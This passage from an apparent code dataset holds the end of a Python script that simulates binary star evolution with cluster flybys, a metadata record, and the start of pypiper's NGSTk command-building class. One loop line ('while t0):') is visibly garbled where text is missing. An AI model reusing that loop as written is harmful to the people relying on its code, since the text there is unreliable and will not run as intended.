KeplerRing(ecc, inc, long_asc, arg_peri, [R1, z1, phi1], v1, a=a_in, m=m_bin, q=1)\n# ts = np.linspace(0, 2*(t2-t1), 1000)\n# k.integrate(ts, pot=pot, relativity=True, gw=True, tau_0=lambda *args: tau_0(args[0]|units.pc, m_bin|units.MSun, args[1]|units.pc).value_in(units.yr), random_number=1.4, rtol=1e-7, atol=1e-10)\n# R2real, z2real, phi2real = k.r(t2-t1)\n# v2real = k.v(t2-t1)\n\n# E1 = (np.linalg.norm(v1)/_kms)**2/2 + evaluatePotentials(pot, R1/_pc, z1/_pc, phi=phi1, use_physical=False) \n# E2 = (np.linalg.norm(v2)/_kms)**2/2 + evaluatePotentials(pot, R2/_pc, z2/_pc, phi=phi2, use_physical=False) \n# E2real = (np.linalg.norm(v2real)/_kms)**2/2 + evaluatePotentials(pot, R2real/_pc, z2real/_pc, phi=phi2real, use_physical=False) \n\ndef evolve_binary_noenc (input):\n\n\tt = input.t\n\n\t# Outer binary parameters\n\ta_out = input.a_out # Outer semi-major axis in pc\n\tecc_out = input.e_out # Outer orbit 
eccentricity\n\tinc_out = input.inc_out # Outer orbit inclination\n\n\t# Inner binary parameters\n\tm1 = input.m1\n\tm2 = input.m2\n\ta_in = input.a # Semi-major axis in AU\n\tecc = input.e \t# Eccentricity\n\tinc = input.i # Inclination with respect to the z-axis\n\targ_peri = input.omega # Arugment of pericentre\n\tlong_asc = input.Omega # Longitude of the ascending node\n\tm_bin = m1+m2 # Total mass in solar masses\n\n\t# Start at pericentre\n\tr = a_out * (1 - ecc_out) # Spherical radius\n\tR = r * np.cos(inc_out) # Cylindrical radius\n\tz = r * np.sin(inc_out) # Cylindrical height\n\n\t# Potential\n\tb = input.b\n\tm_total = input.m_total\n\ttype = input.potential\n\tif type==\"Plummer\": pot = PlummerPotential(amp=m_total*u.solMass, b=b*u.pc) \n\telif type==\"Hernquist\": pot = HernquistPotential(amp=2*m_total*u.solMass, a=b*u.pc) \n\telif type=='Kepler': pot = KeplerPotential(amp=m_total*u.solMass)\n\n\t# Compute the correct v_phi at pericentre for the selected eccentricity and potential\n\tv_phi = ecc_to_vel(pot, ecc_out, [R, z, 0])\n\n\t# Define the KeplerRing\n\tk = KeplerRing(ecc, inc, long_asc, arg_peri, [R, z, 0], [0, 0, v_phi], a=a_in, m=m_bin, q=m2/m1)\n\tk1 = KeplerRing(ecc, inc, long_asc, arg_peri, [R, z, 0], [0, 0, v_phi], a=a_in, m=m_bin, q=m2/m1)\n\n\t# output_file = open(input.output_file, 'w+')\n\t# print('t[yr] R[pc] z phi v_R[km/s] v_z v_phi a[AU] m[MSun] q ecc inc long_asc arg_peri, outer_integration_time, tidal_time, inner_integration_time', file=output_file)\n\t# print(0, R, z, 0, 0, 0, v_phi, k.a(), k.m(), k._q, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), file=output_file, flush=True)\n\n\tif type=='Kepler':\n\t\tT = 2*np.pi*np.sqrt((r|units.pc)**3/G/(m_total|units.MSun))\n\telse:\n\t\tT = 2*np.pi*(r|units.pc)/sigma(r|units.pc, type, m_total, b)\t# approximate outer period\n\tn = max(int(input.n*t/(T.value_in(units.yr))), 100)\t#number of points used to approximate the outer orbit\n\t# n=10\n\tts = np.linspace(0, t, n)+input.t0\n\trtol=input.rtol #1e-11\n\tatol= rtol*1e-3 #1e-14\n\t\n\tk.integrate(ts, pot=pot, relativity=input.relativity, gw=input.gw, tau_0=lambda *args: tau_0(args[0]|units.pc, k.m()|units.MSun, args[1]|units.pc, 50, type, m_total, b, m_per=m_per).value_in(units.yr), random_number=1e10, rtol=rtol, atol=atol, approximation=input.approximation, debug_file=input.output_file_2, points_per_period=input.n, ej_method='LSODA')\n\tif k.switch_to_gr:\n\t\tts += k.t_fin\n\t\tk = KeplerRing(k.ecc_fin, k.inc_fin, k.long_asc_fin, k.arg_peri_fin, k.r(k.t_fin), k.v(k.t_fin), a=k.a_fin, m=k._m, q=k._q)\n\t\tk.integrate(ts, pot=pot, relativity=input.relativity, gw=input.gw, tau_0=lambda *args: tau_0(args[0]|units.pc, k.m()|units.MSun, args[1]|units.pc, 50, type, m_total, b, m_per=m_per).value_in(units.yr), random_number=1e10, rtol=rtol, atol=atol, approximation=2, debug_file=input.output_file_2, points_per_period=input.n)\n\n\t# print('da de di dOmega domega', file=output_file)\n\t# if k.merger: print('merger at', k.t_fin, file=output_file, flush=True)\n\t# else: print(k.t_fin, k.a_fin-a_in, k.ecc_fin-ecc, k.inc_fin-inc, k.long_asc_fin-long_asc, k.arg_peri_fin-arg_peri, k.outer_integration_time, k.tidal_time, k.inner_integration_time, file=output_file, flush=True)\n\t# print('epsilon =', k.epsilon_gr, file=output_file, flush=True)\n\ndef evolve_binary (input):\n\t# 0 - binary has survived until t_final\n\t# 1 - binary has merged\n\t# 2 - binary has been destroyed\n\t# 3 - maximum calculation time exceeded\n\t# 4 - maximum semimajor axis exceeded\n\t# 5 - binary 
has been ejected from the cluster\n\n\tt_final = input.t|units.yr\n\tm_per = input.m_per|units.MSun\n\n\tif input.includeWeakEncounters: Q_max_a = input.Q_max_a\n\telse: Q_max_a = Q_hybrid_a\n\tQ_min_a = input.Q_min_a\n\t\n\t# Potential\n\tb = input.b\n\tm_total = input.m_total\n\ttype = input.potential\n\tif type==\"Plummer\": pot = PlummerPotential(amp=m_total*u.solMass, b=b*u.pc) \n\telif type==\"Hernquist\": pot = HernquistPotential(amp=2*m_total*u.solMass, a=b*u.pc) \n\n\tif os.path.isfile(input.sameParameters):\n\t\twith open(input.sameParameters) as f:\n\t\t\tfor line in f:\n\t\t\t\tdata = line.split()\n\t\t\t\tif isfloat(data[0]): break\n\t\t\tt = float(data[0])|units.yr\n\t\t\tR = float(data[1])\n\t\t\tz = float(data[2])\n\t\t\tphi = float(data[3])\n\t\t\tv_R = float(data[4])\n\t\t\tv_z = float(data[5])\n\t\t\tv_phi = float(data[6])\n\t\t\ta_in = float(data[7])\n\t\t\tm_bin = float(data[8])\n\t\t\tq = float(data[9])\n\t\t\tecc = float(data[10])\n\t\t\tinc = float(data[11])\n\t\t\tlong_asc = float(data[12])\n\t\t\targ_peri = float(data[13])\n\t\tk = KeplerRing(ecc, inc, long_asc, arg_peri, [R, z, phi], [v_R, v_z, v_phi], a=a_in, m=m_bin, q=q)\n\t\toutput_file = open(input.output_file, 'w+')\n\t\tprint('t[yr] R[pc] z phi v_R[km/s] v_z v_phi a[AU] m[MSun] q ecc inc long_asc arg_peri random_number_0 dt[yr] n epsilon_gr t_orbit[s] |de|', file=output_file)\t# |de| is the integral of |de/dt|_tidal\n\t\tprint('perturber: m_per[MSun] Q[AU] eStar iStar OmegaStar omegaStar t_3body[s]', file=output_file)\n\t\tprint(0, R, z, 0, 0, 0, v_phi, k.a(), k.m(), k._q, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), file=output_file)\n\t\toutput_file.flush()\n\telif input.resume and os.path.isfile(input.output_file):\n\t\twith open(input.output_file) as f:\n\t\t\tfor line in f: pass\n\t\t\tdata = line.split()\n\t\t\tif data[1] == 'merger': return 1\n\t\t\tif data[1] == 'destroyed': return 2\n\t\t\tif data[1] == 'maximum' and data[2] == 'calculation': return 3\n\t\t\tif data[1] == 'maximum' and data[2] == 'semimajor': return 4\n\t\t\tif data[1] == 'ejected': return 5\n\t\t\tt = float(data[0])|units.yr\n\t\t\tif t>t_final: return 0\n\t\t\tfor index in range(14):\n\t\t\t\tif not isfloat(data[index]):\n\t\t\t\t\tprint(\"bad file:\", input.output_file)\n\t\t\t\t\tprint(\"bad line:\", line)\n\t\t\t\t\tprint(\"bad segment:\", data[index])\n\t\t\tR = float(data[1])\n\t\t\tz = float(data[2])\n\t\t\tphi = float(data[3])\n\t\t\tv_R = float(data[4])\n\t\t\tv_z = float(data[5])\n\t\t\tv_phi = float(data[6])\n\t\t\ta_in = float(data[7])\n\t\t\tm_bin = float(data[8])\n\t\t\tq = float(data[9])\n\t\t\tecc = float(data[10])\n\t\t\tinc = float(data[11])\n\t\t\tlong_asc = float(data[12])\n\t\t\targ_peri = float(data[13])\n\t\tk = KeplerRing(ecc, inc, long_asc, arg_peri, [R, z, phi], [v_R, v_z, v_phi], a=a_in, m=m_bin, q=q)\n\t\toutput_file = open(input.output_file, 'a')\n\telse:\n\t\tt = 0|units.yr\n\n\t\t# Outer binary parameters\n\t\ta_out = input.a_out # Outer semi-major axis in pc\n\t\tecc_out = input.e_out # Outer orbit eccentricity\n\t\tinc_out = input.inc_out # Outer orbit inclination,\n\n\t\t# Inner binary parameters\n\t\tm1 = input.m1\n\t\tm2 = input.m2\n\t\ta_in = input.a # Semi-major axis in AU\n\t\tecc = input.e \t# Eccentricity\n\t\tinc = input.i # Inclination with respect to the z-axis\n\t\targ_peri = input.omega # Arugment of pericentre\n\t\tlong_asc = input.Omega # Longitude of the ascending node\n\t\tm_bin = m1+m2 # Total mass in solar masses\n\t\tm_bin_init = m_bin|units.MSun\n\n\t\t# Start at 
pericentre\n\t\tr = a_out * (1 - ecc_out) # Spherical radius\n\t\tR = r * np.cos(inc_out) # Cylindrical radius\n\t\tz = r * np.sin(inc_out) # Cylindrical height\n\n\t\t# Compute the correct v_phi at pericentre for the selected eccentricity and potential\n\t\tv_phi = ecc_to_vel(pot, ecc_out, [R, z, 0])\n\n\t\t# Define the KeplerRing\n\t\tk = KeplerRing(ecc, inc, long_asc, arg_peri, [R, z, 0], [0, 0, v_phi], a=a_in, m=m_bin, q=m2/m1)\n\n\t\toutput_file = open(input.output_file, 'w+')\n\t\tprint('t[yr] R[pc] z phi v_R[km/s] v_z v_phi a[AU] m[MSun] q ecc inc long_asc arg_peri random_number_0 dt[yr] n epsilon_gr t_orbit[s] |de| |di|', file=output_file)\t# |de| is the integral of |de/dt|_tidal\n\t\tprint('perturber: m_per[MSun] Q[AU] eStar iStar OmegaStar omegaStar t_3body[s]', file=output_file)\n\t\tprint(0, R, z, 0, 0, 0, v_phi, k.a(), k.m(), k._q, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), file=output_file)\n\t\toutput_file.flush()\n\n\trtol=input.rtol #1e-11\n\tatol= rtol*1e-3 #1e-14\n\n\ttimeTotal1 = time.time()\n\ttimeClose = 0\n\ttimeDistant = 0\n\ttimeOrbit = 0\n\ttimeLoop = 0\n\twhile t0):\n\t\t\tif switch_to_gr: approximation = 2\n\t\t\tts = np.linspace(0, dt.value_in(units.yr), n+1)#100*n+1) #n is the number of time intervals\n\t\t\tk.integrate(ts, pot=pot, relativity=input.relativity, tidal_effects=input.tidal_effects, gw=input.gw, tau_0=lambda *args: tau_0(args[0]|units.pc, k.m()|units.MSun, args[1]|units.pc, Q_max_a, type, m_total, b, args[2]|units.kms, m_per=m_per).value_in(units.yr), random_number=random_number, rtol=rtol, atol=atol, approximation=approximation, debug_file=input.output_file_2, points_per_period=input.n) #, rtol=1e-3, atol=1e-6)\n\t\t\tt += k.t_fin|units.yr\n\t\t\tif k.merger: break\n\t\t\trandom_number = k.probability\n\t\t\touter_integration_time = k.outer_integration_time\n\t\t\ttidal_time = k.tidal_time\n\t\t\tinner_integration_time = k.inner_integration_time\n\t\t\tepsilon_gr = k.epsilon_gr\n\t\t\tde_abs += k.de_abs\n\t\t\tdi_abs += k.di_abs\n\t\t\tif not switch_to_gr: switch_to_gr = k.switch_to_gr\n\t\t\tk = KeplerRing(k.ecc_fin, k.inc_fin, k.long_asc_fin, k.arg_peri_fin, k.r(k.t_fin), k.v(k.t_fin), a=k.a_fin, m=k._m, q=k._q)\n\t\t\tif t>=t_final: break\n\t\t\tR, z, phi = k.r()\n\t\t\tif np.sqrt(R**2+z**2) > 100: break\n\t\ttimeOrbit2 = time.time()\n\t\ttimeOrbit += timeOrbit2 - timeOrbit1\n\t\tR, z, phi = k.r()\n\t\tv_R, v_z, v_phi = k.v()\n\t\tif k.merger:\n\t\t\tprint(t.value_in(units.yr), \"merger\", file=output_file)\n\t\t\treturn 1\n\t\tprint(t.value_in(units.yr), R, z, phi, v_R, v_z, v_phi, k.a(), k.m(), k._q, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), random_number_0, dt.value_in(units.yr), n, epsilon_gr, time.time()-time0, de_abs, di_abs, file=output_file)\n\t\toutput_file.flush()\n\t\tif t>=t_final: return 0\n\t\tif np.sqrt(R**2+z**2) > 100:\n\t\t\tprint(t.value_in(units.yr), \"ejected\", file=output_file)\n\t\t\treturn 5\n\t\tif input.includeEncounters:\n\t\t\ttime3body = time.time()\n\t\t\t# sample the perturber parameters\n\t\t\tQ = 0|units.m\n\t\t\twhile Q<=Q_min_a*(k.a()|units.AU):\n\t\t\t\tm_per, aStar, eStar, iStar, OmegaStar, omegaStar = sample_encounter_parameters (k.a()|units.AU, k.m()|units.MSun, np.sqrt(R**2+z**2)|units.pc, phi, Q_max_a, type, m_total, b, [v_R, v_phi, v_z], m_per=m_per)\n\t\t\t\tQ = aStar*(1-eStar)\n\n\t\t\t# perform the scattering\n\t\t\tq = k._q\n\t\t\tm1 = k.m()/(1+q)\n\t\t\tm2 = k.m()*q/(1+q)\n\t\t\tif Q<=Q_hybrid_a*(k.a()|units.AU):\n\t\t\t\ttimeClose1 = time.time()\n\t\t\t\tresult, third_body_final, 
dv_binary, a_fin, e_fin, i_fin, Omega_fin, omega_fin, n_3body = scattering_hybrid (m1|units.MSun, m2|units.MSun, k.a()|units.AU, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), m_per, aStar, eStar, iStar, OmegaStar, omegaStar)\n\t\t\t\ttimeClose2 = time.time()\n\t\t\t\ttimeClose += timeClose2 - timeClose1 \n\t\t\telse:\n\t\t\t\tresult = 0\n\t\t\t\tthird_body_final = 2\n\t\t\t\ttimeDistant1 = time.time()\n\t\t\t\tdv_binary, a_fin, e_fin, i_fin, Omega_fin, omega_fin = scattering_SA (m1|units.MSun, m2|units.MSun, k.a()|units.AU, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), m_per, aStar, eStar, iStar, OmegaStar, omegaStar)\n\t\t\t\ttimeDistant2 = time.time()\n\t\t\t\ttimeDistant += timeDistant2 - timeDistant1\n\t\t\t\t \n\t\t\tprint('perturber: ', m_per.value_in(units.MSun), Q.value_in(units.AU), eStar, iStar, OmegaStar, omegaStar, file=output_file)\n\t\t\toutput_file.flush()\n\t\t\tif result == 2:\n\t\t\t\tprint(t.value_in(units.yr), \"destroyed\", file=output_file)\n\t\t\t\treturn 2 \n\t\t\telif result == 1: \n\t\t\t\tprint(t.value_in(units.yr), \"calculation abandoned after more than n_orbits_max bound orbits\", file=output_file)\n\t\t\t\toutput_file.flush()\n\t\t\telif result == 3: \n\t\t\t\tprint(t.value_in(units.yr), \"calculation abandoned after spending too much time in a 3-body phase\", file=output_file)\n\t\t\t\toutput_file.flush()\n\t\t\telif result == 0:\n\t\t\t\t# assign new orbital parameters to the binary\n\t\t\t\tif third_body_final == 0: m1 = m_per.value_in(units.MSun)\n\t\t\t\tif third_body_final == 1: m2 = m_per.value_in(units.MSun)\n\t\t\t\tv_R, v_z, v_phi = k.v()\t#velocity before the scattering\n\t\t\t\tx = R * np.cos(phi)\n\t\t\t\ty = R * np.sin(phi)\n\t\t\t\tif input.disableKicks:\n\t\t\t\t\tdv_x = 0\n\t\t\t\t\tdv_y = 0\n\t\t\t\t\tdv_z = 0\n\t\t\t\telse:\n\t\t\t\t\tdv_x = dv_binary[0].value_in(units.kms)\t#velocity change during the scattering\n\t\t\t\t\tdv_y = dv_binary[1].value_in(units.kms)\n\t\t\t\t\tdv_z = dv_binary[2].value_in(units.kms)\n\t\t\t\tdv_R = (x*dv_x+y*dv_y)/R\n\t\t\t\tphi_unit_vector = np.cross([0, 0, 1], [x/R, y/R, 0])\n\t\t\t\tdv_phi = np.dot(phi_unit_vector, [dv_x, dv_y, dv_z])\n\t\t\t\tk = KeplerRing(e_fin, i_fin.value_in(units.rad), Omega_fin.value_in(units.rad), omega_fin.value_in(units.rad), [R, z, phi], [v_R+dv_R, v_z+dv_z, v_phi+dv_phi], a=a_fin.value_in(units.AU), m=m1+m2, q=min(m1/m2, m2/m1))\n\t\t\t\tm_bin = m1+m2\n\t\t\t\tprint(t.value_in(units.yr), R, z, phi, v_R+dv_R, v_z+dv_z, v_phi+dv_phi, k.a(), k.m(), k._q, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), time.time()-time3body, file=output_file)\n\t\t\t\toutput_file.flush()\n\t\t\telse:\n\t\t\t\tprint(t.value_in(units.yr), \"something really weird happened: result =\", result, file=output_file)\n\t\t\n\t\ttimeTotal = time.time()-timeTotal1\n\t\tif timeTotal>input.tmax: \n\t\t\tprint(t.value_in(units.yr), 'maximum calculation time (', str(input.tmax), ' s) exceeded', file=output_file)\n\t\t\toutput_file.flush()\n\t\t\treturn 3\n\t\tif k.a() > input.a_max:\n\t\t\tprint(t.value_in(units.yr), 'maximum semimajor axis (', str(input.a_max), ' AU) exceeded', file=output_file)\n\t\t\toutput_file.flush()\n\t\t\treturn 4\n\n\t# timeTotal2 = time.time()\n\t# print(\"total time\", timeTotal2-timeTotal1, \"s\", file=output_file)\n\t# print(\"close interaction time\", timeClose, \"s\", file=output_file)\n\t# print(\"distant interaction time\", timeDistant, \"s\", file=output_file)\n\t# print(\"outer orbit integration time\", timeOrbit, \"s\", file=output_file)\n\toutput_file.close()\n\n\treturn 
0\n\ndef evolve_binary_encounters_only (input, n_enc, randomize):\n\n\tif input.includeWeakEncounters: Q_max_a = input.Q_max_a\n\telse: Q_max_a = Q_hybrid_a\n\t\n\t# Potential\n\tb = input.b\n\tm_total = input.m_total\n\ttype = input.potential\n\tif type==\"Plummer\": pot = PlummerPotential(amp=m_total*u.solMass, b=b*u.pc) \n\telif type==\"Hernquist\": pot = HernquistPotential(amp=2*m_total*u.solMass, a=b*u.pc) \n\n\t# Outer binary parameters\n\ta_out = input.a_out # Outer semi-major axis in pc\n\tecc_out = input.e_out # Outer orbit eccentricity\n\tinc_out = input.inc_out # Outer orbit inclination,\n\n\t# Inner binary parameters\n\tm1 = input.m1\n\tm2 = input.m2\n\ta_in = input.a # Semi-major axis in AU\n\tecc = input.e \t# Eccentricity\n\tinc = input.i # Inclination with respect to the z-axis\n\targ_peri = input.omega # Arugment of pericentre\n\tlong_asc = input.Omega # Longitude of the ascending node\n\tm_bin = m1+m2 # Total mass in solar masses\n\tm_bin_init = m_bin|units.MSun\n\n\t# Start at pericentre\n\tr = a_out * (1 - ecc_out) # Spherical radius\n\tR = r * np.cos(inc_out) # Cylindrical radius\n\tz = r * np.sin(inc_out) # Cylindrical height\n\tphi = 0\n\n\t# Compute the correct v_phi at pericentre for the selected eccentricity and potential\n\tv_phi = ecc_to_vel(pot, ecc_out, [R, z, 0])\n\n\t# Define the KeplerRing\n\tk = KeplerRing(ecc, inc, long_asc, arg_peri, [R, z, 0], [0, 0, v_phi], a=a_in, m=m_bin, q=m2/m1)\n\n\toutput_file = open(input.output_file, 'a')\n\tprint('R[pc] z phi v_R[km/s] v_z v_phi a[AU] m[MSun] q ecc inc long_asc arg_peri t_3body[s]', file=output_file)\n\tprint('perturber: m_per[MSun] Q[AU] eStar iStar OmegaStar omegaStar', file=output_file)\n\tprint(R, z, phi, 0, 0, v_phi, k.a(), k.m(), k._q, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), file=output_file)\n\toutput_file.flush()\n\n\trtol=input.rtol #1e-11\n\tatol= rtol*1e-3 #1e-14\n\n\tfor i in range(n_enc):\n\t\tif randomize:\n\t\t\targ_peri = 2*np.pi*np.random.random_sample()\n\t\t\tlong_asc = 2*np.pi*np.random.random_sample()\n\t\t\tinc = np.arccos(2*np.random.random_sample()-1)\n\t\t\tk = KeplerRing(ecc, inc, long_asc, arg_peri, [R, z, 0], [0, 0, v_phi], a=a_in, m=m_bin, q=m2/m1)\n\t\t\tprint(R, z, phi, 0, 0, v_phi, k.a(), k.m(), k._q, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), file=output_file)\n\t\t\toutput_file.flush()\n\t\ttime3body = time.time()\n\t\t# sample the perturber parameters\n\t\tm_per, aStar, eStar, iStar, OmegaStar, omegaStar = sample_encounter_parameters (k.a()|units.AU, k.m()|units.MSun, np.sqrt(R**2+z**2)|units.pc, phi, Q_max_a, type, m_total, b, [0, v_phi, 0], m_per=m_per)\n\t\tQ = aStar*(1-eStar)\n\t\tprint('perturber: ', m_per.value_in(units.MSun), Q.value_in(units.AU), eStar, iStar, OmegaStar, omegaStar, file=output_file)\n\t\toutput_file.flush()\n\n\t\t# perform the scattering\n\t\tq = k._q\n\t\tm1 = k.m()/(1+q)\n\t\tm2 = k.m()*q/(1+q)\n\t\tif Q<=Q_hybrid_a*(k.a()|units.AU):\n\t\t\tresult, third_body_final, dv_binary, a_fin, e_fin, i_fin, Omega_fin, omega_fin, n_3body = scattering_hybrid (m1|units.MSun, m2|units.MSun, k.a()|units.AU, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), m_per, aStar, eStar, iStar, OmegaStar, omegaStar)\n\t\telse:\n\t\t\tresult = 0\n\t\t\tthird_body_final = 2\n\t\t\tdv_binary, a_fin, e_fin, i_fin, Omega_fin, omega_fin = scattering_SA (m1|units.MSun, m2|units.MSun, k.a()|units.AU, k.ecc(), k.inc(), k.long_asc(), k.arg_peri(), m_per, aStar, eStar, iStar, OmegaStar, omegaStar)\n\n\t\tif result == 2:\n\t\t\tprint(t.value_in(units.yr), \"destroyed\", 
file=output_file)\n\t\t\treturn 2 \n\t\telif result == 1: \n\t\t\tprint(t.value_in(units.yr), \"calculation abandoned after more than n_orbits_max bound orbits\", file=output_file)\n\t\t\toutput_file.flush()\n\t\telif result == 3: \n\t\t\tprint(t.value_in(units.yr), \"calculation abandoned after spending too much time in a 3-body phase\", file=output_file)\n\t\t\toutput_file.flush()\n\t\telif result == 0:\n\t\t\t# assign new orbital parameters to the binary\n\t\t\tif third_body_final == 0: m1 = m_per.value_in(units.MSun)\n\t\t\tif third_body_final == 1: m2 = m_per.value_in(units.MSun)\n\t\t\tv_R, v_z, v_phi = k.v()\t#velocity before the scattering\n\t\t\tx = R * np.cos(phi)\n\t\t\ty = R * np.sin(phi)\n\t\t\tdv_x = dv_binary[0].value_in(units.kms)\t#velocity change during the scattering\n\t\t\tdv_y = dv_binary[1].value_in(units.kms)\n\t\t\tdv_z = dv_binary[2].value_in(units.kms)\n\t\t\tdv_R = (x*dv_x+y*dv_y)/R\n\t\t\tphi_unit_vector = np.cross([0, 0, 1], [x/R, y/R, 0])\n\t\t\tdv_phi = np.dot(phi_unit_vector, [dv_x, dv_y, dv_z])\n\t\t\tk1 = KeplerRing(e_fin, i_fin.value_in(units.rad), Omega_fin.value_in(units.rad), omega_fin.value_in(units.rad), [R, z, phi], [v_R+dv_R, v_z+dv_z, v_phi+dv_phi], a=a_fin.value_in(units.AU), m=m1+m2, q=min(m1/m2, m2/m1))\n\t\t\tm_bin = m1+m2\n\t\t\tprint(R, z, phi, v_R+dv_R, v_z+dv_z, v_phi+dv_phi, k1.a(), k1.m(), k1._q, k1.ecc(), k1.inc(), k1.long_asc(), k1.arg_peri(), time.time()-time3body, file=output_file)\n\t\t\toutput_file.flush()\n\n\toutput_file.close()\n\n\treturn 0","repo_name":"RZCas/binary-evolution-in-a-cluster","sub_path":"binary_evolution_with_flybys.py","file_name":"binary_evolution_with_flybys.py","file_ext":"py","file_size_in_byte":30312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18843752867","text":"\"\"\" Broadly applicable NGS processing/analysis functionality \"\"\"\n\nimport errno\nimport os\nimport re\nimport subprocess\n\nfrom attmap import AttMapEcho\nfrom yacman import load_yaml\n\nfrom .exceptions import UnsupportedFiletypeException\nfrom .utils import is_fastq, is_gzipped_fastq, is_sam_or_bam\n\n\nclass NGSTk(AttMapEcho):\n \"\"\"\n Class to hold functions to build command strings used during pipeline runs.\n Object can be instantiated with a string of a path to a yaml `pipeline config file`.\n Since NGSTk inherits from `AttMapEcho`, the passed config file and its elements\n will be accessible through the NGSTk object as attributes under `config` (e.g.\n `NGSTk.tools.java`). 
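For example, a config file whose `tools` section reads\n\n        tools:\n          java: /usr/bin/java\n          samtools: /usr/local/bin/samtools\n\n    (paths here are purely illustrative, not defaults) would expose those\n    locations as `NGSTk.tools.java` and `NGSTk.tools.samtools`.\n\n    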
In case no `config_file` argument is passed, all commands will\n be returned assuming the tool is in the user's $PATH.\n\n :param str config_file: Path to pipeline yaml config file (optional).\n :param pypiper.PipelineManager pm: A PipelineManager with which to associate this toolkit instance;\n that is, essentially a source from which to grab paths to tools,\n resources, etc.\n\n :Example:\n\n from pypiper.ngstk import NGSTk as tk\n tk = NGSTk()\n tk.samtools_index(\"sample.bam\")\n # returns: samtools index sample.bam\n\n # Using a configuration file (custom executable location):\n from pypiper.ngstk import NGSTk\n tk = NGSTk(\"pipeline_config_file.yaml\")\n tk.samtools_index(\"sample.bam\")\n # returns: /home/.local/samtools/bin/samtools index sample.bam\n\n \"\"\"\n\n def __init__(self, config_file=None, pm=None):\n # parse yaml into the project's attributes\n # self.add_entries(**config)\n super(NGSTk, self).__init__(\n None if config_file is None else load_yaml(config_file)\n )\n\n # Keep a link to the pipeline manager, if one is provided.\n # if None is provided, instantiate \"tools\" and \"parameters\" with empty AttMaps\n # this allows the usage of the same code for a command with and without using a pipeline manager\n if pm is not None:\n self.pm = pm\n if hasattr(pm.config, \"tools\"):\n self.tools = self.pm.config.tools\n else:\n self.tools = AttMapEcho()\n if hasattr(pm.config, \"parameters\"):\n self.parameters = self.pm.config.parameters\n else:\n self.parameters = AttMapEcho()\n else:\n self.tools = AttMapEcho()\n self.parameters = AttMapEcho()\n\n # If pigz is available, use that. Otherwise, default to gzip.\n if (\n hasattr(self.pm, \"cores\")\n and self.pm.cores > 1\n and self.check_command(\"pigz\")\n ):\n self.ziptool_cmd = \"pigz -f -p {}\".format(self.pm.cores)\n else:\n self.ziptool_cmd = \"gzip -f\"\n\n def _ensure_folders(self, *paths):\n \"\"\"\n Ensure that paths to folder(s) exist.\n\n Some command-line tools will not attempt to create folder(s) needed\n for output path to exist. 
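(For instance, a tool asked to write `results/aligned.bam` -- a hypothetical\n        path -- may simply fail if `results/` does not yet exist.)\n        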
They instead assume that they already are\n present and will fail if that assumption does not hold.\n\n :param Iterable[str] paths: Collection of path for which\n \"\"\"\n for p in paths:\n # Only provide assurance for absolute paths.\n if not p or not os.path.isabs(p):\n continue\n # See if what we're assuring is file- or folder-like.\n fpath, fname = os.path.split(p)\n base, ext = os.path.splitext(fname)\n # If there's no extension, ensure that we have the whole path.\n # Otherwise, just ensure that we have path to file's folder.\n self.make_dir(fpath if ext else p)\n\n @property\n def ziptool(self):\n \"\"\"\n Returns the command to use for compressing/decompressing.\n\n :return str: Either 'gzip' or 'pigz' if installed and multiple cores\n \"\"\"\n return self.ziptool_cmd\n\n def make_dir(self, path):\n \"\"\"\n Forge path to directory, creating intermediates as needed.\n\n :param str path: Path to create.\n \"\"\"\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n def make_sure_path_exists(self, path):\n \"\"\"Alias for make_dir\"\"\"\n self.make_dir(path)\n\n # Borrowed from looper\n def check_command(self, command):\n \"\"\"\n Check if command can be called.\n \"\"\"\n\n # Use `command` to see if command is callable, store exit code\n code = os.system(\n \"command -v {0} >/dev/null 2>&1 || {{ exit 1; }}\".format(command)\n )\n\n # If exit code is not 0, report which command failed and return False, else return True\n if code != 0:\n print(\"Command is not callable: {0}\".format(command))\n return False\n else:\n return True\n\n def get_file_size(self, filenames):\n \"\"\"\n Get size of all files in string (space-separated) in megabytes (Mb).\n\n :param str filenames: a space-separated string of filenames\n \"\"\"\n # use (1024 ** 3) for gigabytes\n # equivalent to: stat -Lc '%s' filename\n\n # If given a list, recurse through it.\n if type(filenames) is list:\n return sum([self.get_file_size(filename) for filename in filenames])\n\n return round(\n sum([float(os.stat(f).st_size) for f in filenames.split(\" \")])\n / (1024**2),\n 4,\n )\n\n def mark_duplicates(\n self, aligned_file, out_file, metrics_file, remove_duplicates=\"True\"\n ):\n cmd = self.tools.java\n if self.pm.javamem: # If a memory restriction exists.\n cmd += \" -Xmx\" + self.pm.javamem\n cmd += \" -jar \" + self.tools.picard + \" MarkDuplicates\"\n cmd += \" INPUT=\" + aligned_file\n cmd += \" OUTPUT=\" + out_file\n cmd += \" METRICS_FILE=\" + metrics_file\n cmd += \" REMOVE_DUPLICATES=\" + remove_duplicates\n return cmd\n\n def bam2fastq(\n self, input_bam, output_fastq, output_fastq2=None, unpaired_fastq=None\n ):\n \"\"\"\n Create command to convert BAM(s) to FASTQ(s).\n\n :param str input_bam: Path to sequencing reads file to convert\n :param output_fastq: Path to FASTQ to write\n :param output_fastq2: Path to (R2) FASTQ to write\n :param unpaired_fastq: Path to unpaired FASTQ to write\n :return str: Command to convert BAM(s) to FASTQ(s)\n \"\"\"\n self._ensure_folders(output_fastq, output_fastq2, unpaired_fastq)\n cmd = self.tools.java + \" -Xmx\" + self.pm.javamem\n cmd += \" -jar \" + self.tools.picard + \" SamToFastq\"\n cmd += \" INPUT={0}\".format(input_bam)\n cmd += \" FASTQ={0}\".format(output_fastq)\n if output_fastq2 is not None and unpaired_fastq is not None:\n cmd += \" SECOND_END_FASTQ={0}\".format(output_fastq2)\n cmd += \" UNPAIRED_FASTQ={0}\".format(unpaired_fastq)\n return cmd\n\n def bam_to_fastq(self, bam_file, out_fastq_pre, 
